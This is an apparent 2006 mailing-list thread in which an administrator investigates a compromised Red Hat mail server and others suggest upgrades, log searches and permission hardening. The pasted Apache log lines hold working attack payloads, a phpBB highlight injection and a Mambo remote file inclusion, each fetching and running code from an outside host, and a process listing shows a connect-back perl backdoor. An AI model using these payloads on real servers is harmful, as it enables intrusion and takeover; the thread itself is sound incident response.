Thanks Peter - reassuring to know that someone else thinks they probably
didn't get root... I have been watching ps and netstat -p and haven't
seen anything suspicious, nor seen any more rogue messages in my mail
queue... fingers crossed :) I have plans to replace this box ASAP however.
I uncovered this in the apache logs:
./www.myvirtualhost.domain-access_log:86.35.6.242 - -
[25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%
65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%
3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
system weathered that one. Closer to date is:
./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error]
[client 85.214.20.161] request failed: erroneous characters aft
er protocol string: GET
/php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
//209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
HTTP\\x01.1
But it looks like that one failed. Oh well time to update php and clean
out a few old phpbb installs. Thanks all for your help.
David
Peter Maag wrote:
Take a look through your Apache logs to see the URL call they used to
exploit the /tmp directory. Try searching for strings like: 'wget' or
'ftp' within your apache access logs. Chances are you will uncover
the cuplrit script.
Judging by the permissions in the files in your /tmp directory they
most likely did not get root on the box. In the future I would
recommend chmod'ing the following executables to 700:
wget
ftp
lynx
If you can get away with chmoding perl to 700 that will help things
also. Due to the permission settings on this files, they had to have
executed the script with: perl filename.pl
Check out mod_security for Apache as well.
Peter
On 2/10/06, *David* <[EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>> wrote:
Rick Macdougall wrote:
> David wrote:
>> *warning long email*
>>
>> Hi all,
>>
>> We have been running a Shupp toaster for about 18 months on a
Redhat
>> 9 box, and the other day it appears it was compromised by
spammers. I
>> thought if I posted a few things I found about the system drive
>> perhaps someone might be able to help me figure out how/how to
>> prevent this...
>>
>> apache 32499 32498 0 Feb08 ? S 0:00 \_ perl
>> /tmp/dc.txt 67.159.2
>> apache 32503 32499 0 Feb08 ? S 0:00 \_
/bin/bash
>
> Hi,
>
> I believe that is the xmlprc exploit against apache/php (could
be the
> phpbb exploit, but I'm pretty sure the dc.txt is part of the
xmlrpc).
>
> Upgrade your php and apache, find the xmlrpc.php in question and
fix it.
>
> You can then use a tool like qmail-remove to clean out the queue.
>
> Regards,
>
> Rick
>
>
>
Thanks Rick,
I'm running php 4.3.10 and I can't find any information about a xmlrpc
exploit; I also can't find any entries in my logs about dc.txt. I will
keep looking.
Thanks,
David.
!DSPAM:43ecaff4216508586114564!
